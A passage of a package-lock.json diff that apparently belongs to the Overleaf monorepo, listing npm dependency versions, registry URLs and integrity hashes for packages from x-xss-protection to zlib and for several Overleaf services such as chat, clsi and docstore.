"engines": { + "node": ">=10.0.0" + }, + "peerDependencies": { + "bufferutil": "^4.0.1", + "utf-8-validate": ">=5.0.2" + }, + "peerDependenciesMeta": { + "bufferutil": { + "optional": true + }, + "utf-8-validate": { + "optional": true + } + } + }, + "node_modules/x-xss-protection": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/x-xss-protection/-/x-xss-protection-1.3.0.tgz", + "integrity": "sha512-kpyBI9TlVipZO4diReZMAHWtS0MMa/7Kgx8hwG/EuZLiA6sg4Ah/4TRdASHhRRN3boobzcYgFRUFSgHRge6Qhg==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/xml-crypto": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/xml-crypto/-/xml-crypto-3.2.1.tgz", + "integrity": "sha512-0GUNbPtQt+PLMsC5HoZRONX+K6NBJEqpXe/lsvrFj0EqfpGPpVfJKGE7a5jCg8s2+Wkrf/2U1G41kIH+zC9eyQ==", + 
"license": "MIT", + "dependencies": { + "@xmldom/xmldom": "^0.8.8", + "xpath": "0.0.32" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/xml-crypto/node_modules/@xmldom/xmldom": { + "version": "0.8.10", + "resolved": "https://registry.npmjs.org/@xmldom/xmldom/-/xmldom-0.8.10.tgz", + "integrity": "sha512-2WALfTl4xo2SkGCYRt6rDTFfk9R1czmBvUQy12gK2KuRKIpWEhcbbzy8EZXtz/jkRqHX8bFEc6FC1HjX4TUWYw==", + "license": "MIT", + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/xml-crypto/node_modules/xpath": { + "version": "0.0.32", + "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.32.tgz", + "integrity": "sha512-rxMJhSIoiO8vXcWvSifKqhvV96GjiD5wYb8/QHdoRyQvraTpp4IEv944nhGausZZ3u7dhQXteZuZbaqfpB7uYw==", + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/xml-encryption": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/xml-encryption/-/xml-encryption-2.0.0.tgz", + "integrity": "sha512-4Av83DdvAgUQQMfi/w8G01aJshbEZP9ewjmZMpS9t3H+OCZBDvyK4GJPnHGfWiXlArnPbYvR58JB9qF2x9Ds+Q==", + "dependencies": { + "@xmldom/xmldom": "^0.7.0", + "escape-html": "^1.0.3", + "xpath": "0.0.32" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/xml-encryption/node_modules/xpath": { + "version": "0.0.32", + "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.32.tgz", + "integrity": "sha512-rxMJhSIoiO8vXcWvSifKqhvV96GjiD5wYb8/QHdoRyQvraTpp4IEv944nhGausZZ3u7dhQXteZuZbaqfpB7uYw==", + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/xml-name-validator": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/xml-name-validator/-/xml-name-validator-4.0.0.tgz", + "integrity": "sha512-ICP2e+jsHvAj2E2lIHxa5tjXRlKDJo4IdvPvCXbXQGdzSfmSpNVyIKMvoZHjDY9DP0zV17iI85o90vRFXNccRw==", + "dev": true, + "engines": { + "node": ">=12" + } + }, + "node_modules/xml2js": { + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.2.tgz", + "integrity": "sha512-T4rieHaC1EXcES0Kxxj4JWgaUQHDk+qwHcYOCFHfiwKz7tOVPLq7Hjq9dM1WCMhylqMEfP7hMcOIChvotiZegA==", + "dependencies": { + "sax": ">=0.6.0", + "xmlbuilder": "~11.0.0" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/xml2js/node_modules/xmlbuilder": { + "version": "11.0.1", + "resolved": "https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-11.0.1.tgz", + "integrity": "sha512-fDlsI/kFEx7gLvbecc0/ohLG50fugQp8ryHzMTuW9vSa1GJ0XYWKnhsUx7oie3G98+r56aTQIUB4kht42R3JvA==", + "engines": { + "node": ">=4.0" + } + }, + "node_modules/xmlbuilder": { + "version": "15.1.1", + "resolved": "https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-15.1.1.tgz", + "integrity": "sha512-yMqGBqtXyeN1e3TGYvgNgDVZ3j84W4cwkOXQswghol6APgZWaff9lnbvN7MHYJOiXsvGPXtjTYJEiC9J2wv9Eg==", + "engines": { + "node": ">=8.0" + } + }, + "node_modules/xmlchars": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/xmlchars/-/xmlchars-2.2.0.tgz", + "integrity": "sha512-JZnDKK8B0RCDw84FNdDAIpZK+JuJw+s7Lz8nksI7SIuU3UXJJslUthsi+uWBUYOwPFwW7W7PRLRfUKpxjtjFCw==", + "dev": true + }, + "node_modules/xmlcreate": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/xmlcreate/-/xmlcreate-2.0.4.tgz", + "integrity": "sha512-nquOebG4sngPmGPICTS5EnxqhKbCmz5Ox5hsszI2T6U5qdrJizBc+0ilYSEjTSzU0yZcmvppztXe/5Al5fUwdg==" + }, + "node_modules/xmlhttprequest": { + "version": "1.8.0", + "resolved": "https://registry.npmjs.org/xmlhttprequest/-/xmlhttprequest-1.8.0.tgz", + "integrity": "sha512-58Im/U0mlVBLM38NdZjHyhuMtCqa61469k2YP/AaPbvCoV9aQGUpbJBj1QRm2ytRiVQBD/fsw7L2bJGDVQswBA==", + "engines": { + "node": ">=0.4.0" + } + 
}, + "node_modules/xorshift": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/xorshift/-/xorshift-1.2.0.tgz", + "integrity": "sha512-iYgNnGyeeJ4t6U11NpA/QiKy+PXn5Aa3Azg5qkwIFz1tBLllQrjjsk9yzD7IAK0naNU4JxdeDgqW9ov4u/hc4g==" + }, + "node_modules/xpath": { + "version": "0.0.5", + "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.5.tgz", + "integrity": "sha1-RUA29u8PPfWvXUukoRn7dWdLPmw=", + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/xregexp": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/xregexp/-/xregexp-4.4.1.tgz", + "integrity": "sha512-2u9HwfadaJaY9zHtRRnH6BY6CQVNQKkYm3oLtC9gJXXzfsbACg5X5e4EZZGVAH+YIfa+QA9lsFQTTe3HURF3ag==", + "dependencies": { + "@babel/runtime-corejs3": "^7.12.1" + } + }, + "node_modules/xtend": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/xtend/-/xtend-4.0.2.tgz", + "integrity": "sha512-LKYU1iAXJXUgAXn9URjiu+MWhyUXHsvfp7mcuYm9dSUKK0/CjtrUwFAxD82/mCWbtLsGjFIad0wIsod4zrTAEQ==", + "engines": { + "node": ">=0.4" + } + }, + "node_modules/y18n": { + "version": "5.0.8", + "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", + "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", + "engines": { + "node": ">=10" + } + }, + "node_modules/yallist": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", + "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==" + }, + "node_modules/yaml": { + "version": "1.10.2", + "resolved": "https://registry.npmjs.org/yaml/-/yaml-1.10.2.tgz", + "integrity": "sha512-r3vXyErRCYJ7wg28yvBY5VSoAF8ZvlcW9/BwUzEtUsjvX/DKs24dIkuwjtuprwJJHsbyUbLApepYTR1BN4uHrg==", + "dev": true, + "engines": { + "node": ">= 6" + } + }, + "node_modules/yargs": { + "version": "17.7.2", + "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", + "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", + "dependencies": { + "cliui": "^8.0.1", + "escalade": "^3.1.1", + "get-caller-file": "^2.0.5", + "require-directory": "^2.1.1", + "string-width": "^4.2.3", + "y18n": "^5.0.5", + "yargs-parser": "^21.1.1" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/yargs-parser": { + "version": "20.2.4", + "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-20.2.4.tgz", + "integrity": "sha512-WOkpgNhPTlE73h4VFAFsOnomJVaovO8VqLDzy5saChRBFQFBoMYirowyW+Q9HB4HFF4Z7VZTiG3iSzJJA29yRA==", + "dev": true, + "engines": { + "node": ">=10" + } + }, + "node_modules/yargs-unparser": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/yargs-unparser/-/yargs-unparser-2.0.0.tgz", + "integrity": "sha512-7pRTIA9Qc1caZ0bZ6RYRGbHJthJWuakf+WmHK0rVeLkNrrGhfoabBNdue6kdINI6r4if7ocq9aD/n7xwKOdzOA==", + "dev": true, + "license": "MIT", + "dependencies": { + "camelcase": "^6.0.0", + "decamelize": "^4.0.0", + "flat": "^5.0.2", + "is-plain-obj": "^2.1.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/yargs-unparser/node_modules/decamelize": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/decamelize/-/decamelize-4.0.0.tgz", + "integrity": "sha512-9iE1PgSik9HeIIw2JO94IidnE3eBoQrFJ3w7sFuzSX4DpmZ3v5sZpUiV5Swcf6mQEF+Y0ru8Neo+p+nyh2J+hQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/yargs/node_modules/cliui": { + "version": 
"8.0.1", + "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", + "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", + "dependencies": { + "string-width": "^4.2.0", + "strip-ansi": "^6.0.1", + "wrap-ansi": "^7.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/yargs/node_modules/yargs-parser": { + "version": "21.1.1", + "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", + "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", + "engines": { + "node": ">=12" + } + }, + "node_modules/yauzl": { + "version": "2.10.0", + "resolved": "https://registry.npmjs.org/yauzl/-/yauzl-2.10.0.tgz", + "integrity": "sha1-x+sXyT4RLLEIb6bY5R+wZnt5pfk=", + "dependencies": { + "buffer-crc32": "~0.2.3", + "fd-slicer": "~1.1.0" + } + }, + "node_modules/yocto-queue": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", + "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/yup": { + "version": "0.32.11", + "resolved": "https://registry.npmjs.org/yup/-/yup-0.32.11.tgz", + "integrity": "sha512-Z2Fe1bn+eLstG8DRR6FTavGD+MeAwyfmouhHsIUgaADz8jvFKbO/fXc2trJKZg+5EBjh4gGm3iU/t3onKlXHIg==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.15.4", + "@types/lodash": "^4.14.175", + "lodash": "^4.17.21", + "lodash-es": "^4.17.21", + "nanoclone": "^0.2.1", + "property-expr": "^2.0.4", + "toposort": "^2.0.2" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/z-schema": { + "version": "3.25.1", + "resolved": "https://registry.npmjs.org/z-schema/-/z-schema-3.25.1.tgz", + "integrity": "sha512-7tDlwhrBG+oYFdXNOjILSurpfQyuVgkRe3hB2q8TEssamDHB7BbLWYkYO98nTn0FibfdFroFKDjndbgufAgS/Q==", + "dependencies": { + "core-js": "^2.5.7", + "lodash.get": "^4.0.0", + "lodash.isequal": "^4.0.0", + "validator": "^10.0.0" + }, + "bin": { + "z-schema": "bin/z-schema" + }, + "optionalDependencies": { + "commander": "^2.7.1" + } + }, + "node_modules/z-schema/node_modules/commander": { + "version": "2.20.3", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.3.tgz", + "integrity": "sha512-GpVkmM8vF2vQUkj2LvZmD35JxeJOLCwJ9cUkugyk2nuhbv3+mJvpLYYt+0+USMxE+oj+ey/lJEnhZw75x/OMcQ==", + "optional": true + }, + "node_modules/z-schema/node_modules/core-js": { + "version": "2.6.12", + "resolved": "https://registry.npmjs.org/core-js/-/core-js-2.6.12.tgz", + "integrity": "sha512-Kb2wC0fvsWfQrgk8HU5lW6U/Lcs8+9aaYcy4ZFc6DDlo4nZ7n70dEgE5rtR0oG6ufKDUnrwfWL1mXR5ljDatrQ==", + "deprecated": "core-js@<3.4 is no longer maintained and not recommended for usage due to the number of issues. Because of the V8 engine whims, feature detection in old core-js versions could cause a slowdown up to 100x even if nothing is polyfilled. 
Please, upgrade your dependencies to the actual version of core-js.", + "hasInstallScript": true + }, + "node_modules/z-schema/node_modules/validator": { + "version": "10.11.0", + "resolved": "https://registry.npmjs.org/validator/-/validator-10.11.0.tgz", + "integrity": "sha512-X/p3UZerAIsbBfN/IwahhYaBbY68EN/UQBWHtsbXGT5bfrH/p4NQzUCG1kF/rtKaNpnJ7jAu6NGTdSNtyNIXMw==", + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/zip-stream": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/zip-stream/-/zip-stream-4.1.0.tgz", + "integrity": "sha512-zshzwQW7gG7hjpBlgeQP9RuyPGNxvJdzR8SUM3QhxCnLjWN2E7j3dOvpeDcQoETfHx0urRS7EtmVToql7YpU4A==", + "dependencies": { + "archiver-utils": "^2.1.0", + "compress-commons": "^4.1.0", + "readable-stream": "^3.6.0" + }, + "engines": { + "node": ">= 10" + } + }, + "node_modules/zlib": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/zlib/-/zlib-1.0.5.tgz", + "integrity": "sha512-40fpE2II+Cd3k8HWTWONfeKE2jL+P42iWJ1zzps5W51qcTsOUKM5Q5m2PFb0CLxlmFAaUuUdJGc3OfZy947v0w==", + "hasInstallScript": true, + "engines": { + "node": ">=0.2.0" + } + }, + "services/analytics": { + "name": "@overleaf/analytics", + "dependencies": { + "@customerio/cdp-analytics-node": "^0.3.0", + "@google-cloud/bigquery": "^5.9.0", + "@google-cloud/storage": "^6.10.1", + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/redis-wrapper": "*", + "@overleaf/settings": "*", + "@overleaf/stream-utils": "^0.1.0", + "bluebird": "^3.7.2", + "body-parser": "^1.20.3", + "bull": "^3.18.0", + "camelcase-keys": "^4.2.0", + "celebrate": "^15.0.3", + "csv": "^5.4.0", + "east": "^2.0.3", + "express": "^4.21.2", + "joi": "^17.12.0", + "json2csv": "^4.5.4", + "lodash": "^4.17.21", + "minimist": "^1.2.7", + "mixpanel": "^0.13.0", + "moment": "^2.29.4", + "mongodb": "6.12.0", + "p-limit": "^2.3.0", + "pg": "^8.7.1", + "pg-copy-streams": "^2.2.2", + "promptly": "^3.0.3", + "recurly": "^4.0.1", + "request": "^2.88.2", + "sequelize": "^6.31.0", + "yargs": "^17.0.0" + }, + "devDependencies": { + "@pollyjs/adapter-node-http": "^6.0.6", + "@pollyjs/core": "^6.0.6", + "@pollyjs/persister-fs": "^6.0.6", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "^2.0.4", + "sequelize-cli": "^6.6.0", + "sinon": "^9.2.4", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } + }, + "services/analytics/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "services/chat": { + "name": "@overleaf/chat", + "version": "1.0.0", + "license": "AGPL-3.0", + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "exegesis-express": "^4.0.0", + "express": "^4.21.2", + "mongodb": "6.12.0" + }, + "devDependencies": { + "acorn": "^7.1.1", + "ajv": "^6.12.0", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "request": "^2.88.2", + "sandboxed-module": "^2.0.4", + "sinon": "^9.2.4", + "timekeeper": "^2.2.0", + "typescript": "^5.0.4" + } + }, + "services/clsi": { + "name": "@overleaf/clsi", + "dependencies": { 
+ "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/settings": "*", + "archiver": "5.3.2", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "dockerode": "^4.0.5", + "express": "^4.21.2", + "lodash": "^4.17.21", + "p-limit": "^3.1.0", + "request": "^2.88.2", + "send": "^0.19.0", + "tar-fs": "^3.0.4", + "workerpool": "^6.1.5" + }, + "devDependencies": { + "@types/workerpool": "^6.1.0", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "mock-fs": "^5.1.2", + "node-fetch": "^2.7.0", + "sandboxed-module": "^2.0.4", + "sinon": "~9.0.1", + "sinon-chai": "^3.7.0", + "timekeeper": "2.2.0", + "typescript": "^5.0.4" + } + }, + "services/clsi-cache": { + "name": "@overleaf/clsi-cache", + "dependencies": { + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/settings": "*", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "celebrate": "^15.0.3", + "express": "^4.21.2" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0" + } + }, + "services/clsi-perf": { + "name": "@overleaf/clsi-perf", + "dependencies": { + "@google-cloud/bigquery": "^5.6.0", + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/o-error": "*", + "@overleaf/settings": "*", + "bunyan": "^1.8.15", + "cookie": "^0.4.1", + "express": "^4.21.2", + "glob": "^7.2.0", + "p-limit": "^3.1.0" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + } + }, + "services/clsi-perf/node_modules/cookie": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.4.1.tgz", + "integrity": "sha512-ZwrFkGJxUR3EIoXtO+yVE69Eb7KlixbaeAWfBQB9vVsNn/o+Yw69gBWSSDK825hQNdN+wF8zELf3dFNl/kxkUA==", + "engines": { + "node": ">= 0.6" + } + }, + "services/clsi/node_modules/@grpc/grpc-js": { + "version": "1.13.2", + "resolved": "https://registry.npmjs.org/@grpc/grpc-js/-/grpc-js-1.13.2.tgz", + "integrity": "sha512-nnR5nmL6lxF8YBqb6gWvEgLdLh/Fn+kvAdX5hUOnt48sNSb0riz/93ASd2E5gvanPA41X6Yp25bIfGRp1SMb2g==", + "license": "Apache-2.0", + "dependencies": { + "@grpc/proto-loader": "^0.7.13", + "@js-sdsl/ordered-map": "^4.4.2" + }, + "engines": { + "node": ">=12.10.0" + } + }, + "services/clsi/node_modules/cpu-features": { + "version": "0.0.10", + "resolved": "https://registry.npmjs.org/cpu-features/-/cpu-features-0.0.10.tgz", + "integrity": "sha512-9IkYqtX3YHPCzoVg1Py+o9057a3i0fp7S530UWokCSaFVTc7CwXPRiOjRjBQQ18ZCNafx78YfnG+HALxtVmOGA==", + "hasInstallScript": true, + "optional": true, + "dependencies": { + "buildcheck": "~0.0.6", + "nan": "^2.19.0" + }, + "engines": { + "node": ">=10.0.0" + } + }, + "services/clsi/node_modules/diff": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/diff/-/diff-4.0.2.tgz", + "integrity": "sha512-58lmxKSA4BNyLz+HHMUzlOEpg09FV+ev6ZMe3vJihgdxzgcwZ8VoEEPmALCZG9LmqfVoNMMKpttIYTVG6uDY7A==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/clsi/node_modules/docker-modem": { + "version": "5.0.6", + "resolved": "https://registry.npmjs.org/docker-modem/-/docker-modem-5.0.6.tgz", + "integrity": "sha512-ens7BiayssQz/uAxGzH8zGXCtiV24rRWXdjNha5V4zSOcxmAZsfGVm/PPFbwQdqEkDnhG+SyR9E3zSHUbOKXBQ==", + "license": "Apache-2.0", + "dependencies": { + "debug": "^4.1.1", + "readable-stream": "^3.5.0", + 
"split-ca": "^1.0.1", + "ssh2": "^1.15.0" + }, + "engines": { + "node": ">= 8.0" + } + }, + "services/clsi/node_modules/dockerode": { + "version": "4.0.5", + "resolved": "https://registry.npmjs.org/dockerode/-/dockerode-4.0.5.tgz", + "integrity": "sha512-ZPmKSr1k1571Mrh7oIBS/j0AqAccoecY2yH420ni5j1KyNMgnoTh4Nu4FWunh0HZIJmRSmSysJjBIpa/zyWUEA==", + "license": "Apache-2.0", + "dependencies": { + "@balena/dockerignore": "^1.0.2", + "@grpc/grpc-js": "^1.11.1", + "@grpc/proto-loader": "^0.7.13", + "docker-modem": "^5.0.6", + "protobufjs": "^7.3.2", + "tar-fs": "~2.1.2", + "uuid": "^10.0.0" + }, + "engines": { + "node": ">= 8.0" + } + }, + "services/clsi/node_modules/dockerode/node_modules/tar-fs": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-2.1.2.tgz", + "integrity": "sha512-EsaAXwxmx8UB7FRKqeozqEPop69DXcmYwTQwXvyAPF352HJsPdkVhvTaDPYqfNgruveJIJy3TA2l+2zj8LJIJA==", + "license": "MIT", + "dependencies": { + "chownr": "^1.1.1", + "mkdirp-classic": "^0.5.2", + "pump": "^3.0.0", + "tar-stream": "^2.1.4" + } + }, + "services/clsi/node_modules/protobufjs": { + "version": "7.4.0", + "resolved": "https://registry.npmjs.org/protobufjs/-/protobufjs-7.4.0.tgz", + "integrity": "sha512-mRUWCc3KUU4w1jU8sGxICXH/gNS94DvI1gxqDvBzhj1JpcsimQkYiOJfwsPUykUI5ZaspFbSgmBLER8IrQ3tqw==", + "hasInstallScript": true, + "license": "BSD-3-Clause", + "dependencies": { + "@protobufjs/aspromise": "^1.1.2", + "@protobufjs/base64": "^1.1.2", + "@protobufjs/codegen": "^2.0.4", + "@protobufjs/eventemitter": "^1.1.0", + "@protobufjs/fetch": "^1.1.0", + "@protobufjs/float": "^1.0.2", + "@protobufjs/inquire": "^1.1.0", + "@protobufjs/path": "^1.1.2", + "@protobufjs/pool": "^1.1.0", + "@protobufjs/utf8": "^1.1.0", + "@types/node": ">=13.7.0", + "long": "^5.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "services/clsi/node_modules/sinon": { + "version": "9.0.3", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-9.0.3.tgz", + "integrity": "sha512-IKo9MIM111+smz9JGwLmw5U1075n1YXeAq8YeSFlndCLhAL5KGn6bLgu7b/4AYHTV/LcEMcRm2wU2YiL55/6Pg==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.2", + "@sinonjs/fake-timers": "^6.0.1", + "@sinonjs/formatio": "^5.0.1", + "@sinonjs/samsam": "^5.1.0", + "diff": "^4.0.2", + "nise": "^4.0.4", + "supports-color": "^7.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/sinon" + } + }, + "services/clsi/node_modules/ssh2": { + "version": "1.16.0", + "resolved": "https://registry.npmjs.org/ssh2/-/ssh2-1.16.0.tgz", + "integrity": "sha512-r1X4KsBGedJqo7h8F5c4Ybpcr5RjyP+aWIG007uBPRjmdQWfEiVLzSK71Zji1B9sKxwaCvD8y8cwSkYrlLiRRg==", + "hasInstallScript": true, + "dependencies": { + "asn1": "^0.2.6", + "bcrypt-pbkdf": "^1.0.2" + }, + "engines": { + "node": ">=10.16.0" + }, + "optionalDependencies": { + "cpu-features": "~0.0.10", + "nan": "^2.20.0" + } + }, + "services/clsi/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/clsi/node_modules/uuid": { + "version": "10.0.0", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-10.0.0.tgz", + "integrity": "sha512-8XkAphELsDnEGrDxUOHB3RGvXz6TeuYSGEZBOjtTtPm2lwhGBjLgOzLHB63IUWfBpNucQjND6d3AOudO+H3RWQ==", + "funding": [ + "https://github.com/sponsors/broofa", 
+ "https://github.com/sponsors/ctavan" + ], + "license": "MIT", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "services/contacts": { + "name": "@overleaf/contacts", + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/settings": "*", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "express": "^4.21.2", + "mongodb": "6.12.0", + "request": "~2.88.2", + "underscore": "~1.13.1" + }, + "devDependencies": { + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "esmock": "^2.6.3", + "mocha": "^11.1.0", + "sinon": "~9.0.1", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } + }, + "services/contacts/node_modules/diff": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/diff/-/diff-4.0.2.tgz", + "integrity": "sha512-58lmxKSA4BNyLz+HHMUzlOEpg09FV+ev6ZMe3vJihgdxzgcwZ8VoEEPmALCZG9LmqfVoNMMKpttIYTVG6uDY7A==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/contacts/node_modules/sinon": { + "version": "9.0.3", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-9.0.3.tgz", + "integrity": "sha512-IKo9MIM111+smz9JGwLmw5U1075n1YXeAq8YeSFlndCLhAL5KGn6bLgu7b/4AYHTV/LcEMcRm2wU2YiL55/6Pg==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.2", + "@sinonjs/fake-timers": "^6.0.1", + "@sinonjs/formatio": "^5.0.1", + "@sinonjs/samsam": "^5.1.0", + "diff": "^4.0.2", + "nise": "^4.0.4", + "supports-color": "^7.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/sinon" + } + }, + "services/contacts/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "services/docstore": { + "name": "@overleaf/docstore", + "dependencies": { + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/object-persistor": "*", + "@overleaf/promise-utils": "*", + "@overleaf/settings": "*", + "@overleaf/stream-utils": "^0.1.0", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "celebrate": "^15.0.3", + "express": "^4.21.2", + "lodash": "^4.17.21", + "mongodb-legacy": "6.1.3", + "p-map": "^4.0.0", + "request": "^2.88.2" + }, + "devDependencies": { + "@google-cloud/storage": "^6.10.1", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "sandboxed-module": "~2.0.4", + "sinon": "~9.0.2", + "sinon-chai": "^3.7.0", + "typescript": "^5.0.4" + } + }, + "services/docstore/node_modules/diff": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/diff/-/diff-4.0.2.tgz", + "integrity": "sha512-58lmxKSA4BNyLz+HHMUzlOEpg09FV+ev6ZMe3vJihgdxzgcwZ8VoEEPmALCZG9LmqfVoNMMKpttIYTVG6uDY7A==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "services/docstore/node_modules/sinon": { + "version": "9.0.3", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-9.0.3.tgz", + "integrity": "sha512-IKo9MIM111+smz9JGwLmw5U1075n1YXeAq8YeSFlndCLhAL5KGn6bLgu7b/4AYHTV/LcEMcRm2wU2YiL55/6Pg==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.7.2", + 